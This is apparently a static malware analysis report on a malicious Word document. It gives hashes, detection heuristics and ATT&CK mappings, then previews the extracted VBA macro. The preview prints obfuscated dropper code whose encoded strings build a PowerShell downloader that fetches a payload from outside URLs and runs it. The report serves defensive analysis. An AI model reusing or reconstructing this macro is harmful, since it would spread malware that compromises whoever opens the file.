Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c44563e2d7050c6a…

MALICIOUS

Office (OLE)

133.5 KB Created: 2018-02-15 06:24:00 Authoring application: Microsoft Office Word First seen: 2018-02-19
MD5: 281deaa86e4e259c2c40f8e31e6f0138 SHA-1: d8e7c41c182cb2fb963489e0a1df55967434ba0e SHA-256: c44563e2d7050c6aff14ee367e5da2bc8c479b2c3adbeee0d06e9fd5f08fae9e
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The AutoOpen macro triggers a Shell() call, which is a critical finding indicating the execution of arbitrary code. This is strongly indicative of a dropper or downloader functionality, aiming to fetch and execute a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-6449211-0' further supports this assessment.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6449211-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6449211-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 25929 bytes
SHA-256: 32b213338ff3a10369961a8c39492d7d81efd4cc23f567d819f44a9eb09748b9
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "lwXYfJqWCt"
Function SEptGITFD()
On Error Resume Next
TFlZrRDKMkt = (sPpiUlLVrdX - Int(hdwMEpCXP) * QAUBR / Oct(sGGBPHaBm) - (ViQDr - Sin(2691016)))
cmNLzYSZPjL = (obIAPRVPKQnzoJ - Int(TmclXWKZ) * waBUY / Oct(MNCEjZ) - (YcplmE - Sin(8280686)))
bDIiYsXRb = (CztCKdaFqZdC - Int(EpPAq) * Dawjd / Oct(KNAwljFiPtcIR) - (dmHLfCX - Sin(762238)))
XEpXIT = (OJlzcVLRi) + HJjkJKD("bzfinFKSzXlfhtquLZzVpzRtAJuWFfcCLvB+bvBebvB+Nki+Nk'+'ibvBw-obDBq+DBqjecbvB+Nki+NkiDBq+DBqbvBtbvNki+v4w+v4wNkiB) raNki+NkindomNki+DBq+DBqNki;TJWYYNki+NkiU '+'= .(bNkv4w+v4wi+'+'NkivBnNki+Nkie'+'N'+'DBq+DBqki+Nki'+'bNki+v4w+jGC", 34, 189)
sbwAUz = (pKMGicZR - Int(kEbVGtMW) * nDvDn / Oct(tIOOMwG) - (dEOJaSBTdWtWJ - Sin(7611292)))
JWmAJWYV = (tVNmEBUYlWzN - Int(OKEUdNwRrj) * EzUaZKRFFVVs / Oct(LCoIjcmcEbFSSY) - (vpWBmbhEhuwbF - Sin(8565066)))
UQCPF = (FsSEJb - Int(plOzIzXPI) * lYJQzU / Oct(XdzHOh) - (hkwWM - Sin(9855117)))
AXbhhCzMQ = (PJzPZJFpY) + HJjkJKD("vWhSUifIXWcz4w+v4w TJNki+NkiWSDC)Nki+Nki;DBq+DBqNki+Nki&'+'Nki+Nki(Nki+NkibvBInNki+N'+'kivobv4w+v4wvBNki+Nki+bvNki+NkiBkbvB+bNki+Nkiv'+'Nki+NkiBe-I'+'tembvB)Nki+Nki(TJWSDv4w+v'+'4wC);VsNADkHClZjCIwBwiru", 13, 171)
DjIWbdoziCP = (YMhfiR - Int(DNPYCBCJuV) * nPNhRE / Oct(QocpKABEQomfkm) - (ZhYZu - Sin(6047487)))
XRSCYnhiFfu = (QczUYvcsqvd - Int(OcwNCOWwlNW) * lVipjJr / Oct(QkYzsq) - (GcYzqCAYbb - Sin(3765160)))
ULAABmFaZM = (KXhuCGiiC - Int(mLhETTd) * wVMmQ / Oct(NQjMkwHOM) - (hmiqWtJHZtqM - Sin(3222292)))
qAAZYGH = (ihSmrqjir) + HJjkJKD("SMpoPGRNAbETPTrePla'+'ce(([ChAr]8'+'2+[ChAr]97+[ChAr]106),[STRIng][ChArv4w+v4w]34).rePlace(Nki2lfNki,Nkiu7nN'+'ki).v4w+v4wrePlace(([ChAr]98+[DBq+DBqChAr]11FKIVCEWSGA", 15, 141)
BlEmIcO = (FMENXfAztiD - Int(jmOiI) * XJkTmJTnSNX / Oct(AwIqWlE) - (ijjmjsu - Sin(829984)))
nnuRiCABUrH = (ljPOCNcwm - Int(utjNmbidG) * tPdZwwrdwmuOP / Oct(jiIAwjjt) - (MJRzStKCPoL - Sin(5462819)))
nWqvKuaV = (GpQFWwwAi - Int(iRjITdiWMzi) * PjzYknjf / Oct(DpKXSktNi) - (khdmhmkrYlSzcr - Sin(8038535)))
aCGIi = (WwFFXwtXhkm) + HJjkJKD("bvAtjGiCStMoFjsnn4 -crEpLACE([cHaR]118+[cHaR]52+[cHaR]119),[cHaR]39) |. ( $enV:PUBLIC[13]+$EnVErmonMbKFYjNAHdVISBS", 18, 77)
KHqGqt = (PlAwLuHDMShsB - Int(PUlTiXLFQzqj) * IVZwG / Oct(psMNNFFwXPCD) - (rztJSb - Sin(132154)))
cutTDfzRks = (iKUBGiu - Int(inWaEMsCHXOdYo) * NvipAOMHVGZGi / Oct(MHaLzpbjcDiHr) - (uMXpu - Sin(3900250)))
jWYQzHFql = (FXptkV - Int(AUiFKKvPnRZ) * OhSiKsXJMIijMN / Oct(GjlROTvfHZYz) - (HiYFQvGZmti - Sin(221182)))
TmiUiOFhH = (lAskJdDuil) + HJjkJKD("ljUFXbbUjtqfikTphloJjki+Nkiasfc inNki+Nki TJWADCXNki+NDBq+DBqki){Nki+Nkitv4w+v4wNki+Nkiry{TJWYYNki+NkiDBq+DBqv4w+v4wU.Nki+NkiRajDomefNki+NkiDBq+v4w+v4'+'w'+'DBqWnlmNki+NkiefNki+NkiOaNki+NkidFINAIYPIjzwjNuGMuKzZm", 22, 172)
isifilrqk = (vrChkcTQHMTq - Int(QCHboV) * fAGSzWFGQn / Oct(bntFVJmHJ) - (doNVpwkIXr - Sin(2514620)))
jrtNN = (bGukjiOXNAUor - Int(NKjzo) * LCBMtzJaVzs / Oct(KlMmLlZEtmOdUZ) - (miZcZDjiYE - Sin(6588427)))
UivlJ = (mYnBPHYdFqazu - Int(jnYoYsUTX) * vVStiHnhcunjF / Oct(wVvwXvIahBTs) - (kjqWS - Sin(109947)))
NWYLQ = (ofCAKfSBLF) + HJjkJKD("QR]70+[cHaR]81+[cHaR]113),[cHaR]36 -rEpLAce ([cHaR]68+[cHaR]66+[cHa'+'R]113),[cHaR]39) 87F & ((get-VarIABle v4w*MDr*v4w).NamE['+'3,11,2]-Joinv4wv4w)')  -crEpLACE([cHaR]56+[cHaR]55+[cHaR]70),[cHaR]12iCCHjsEfFVKQwb", 2, 197)
poKFbECLTXu = (mXUfI - Int(EjQzasPDhRQ) * RvduwXY / Oct(jGXFMuA) - (jcPXZIkWfaVkT - Sin(3501305)))
maFIRETuiRc = (zJblHX - Int(YzHvvwJLkfsXT) * BslJL / Oct(OYBotR) - (XvlJsTrDSPiMlM - Sin(3898989)))
PFzAi = (qrvwBwRqcwQd - Int(vTBiw) * PzVzDcBjcGzZ / Oct(ujLwzTzZivhwD) - (DWwdinb - Sin(989783)))
afkjo = (CwXvcjVnRZlCC) + HJjkJKD("vv4wi+Nkich.bizNki+Nki/mNki+Nkis27r/?http:Nki+Nki/Nki+Nki/cNki+NkicwNki+NkicNkv4w+v4wi+NkilNki+Nkiass.neNkiv4w+v4w+Nkit/6SNkv4w+v4wi+Nv4w+v'+'4wkirlSDBq+DBqcT/?httpDBq+DBq:NkisQRusfznArK
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.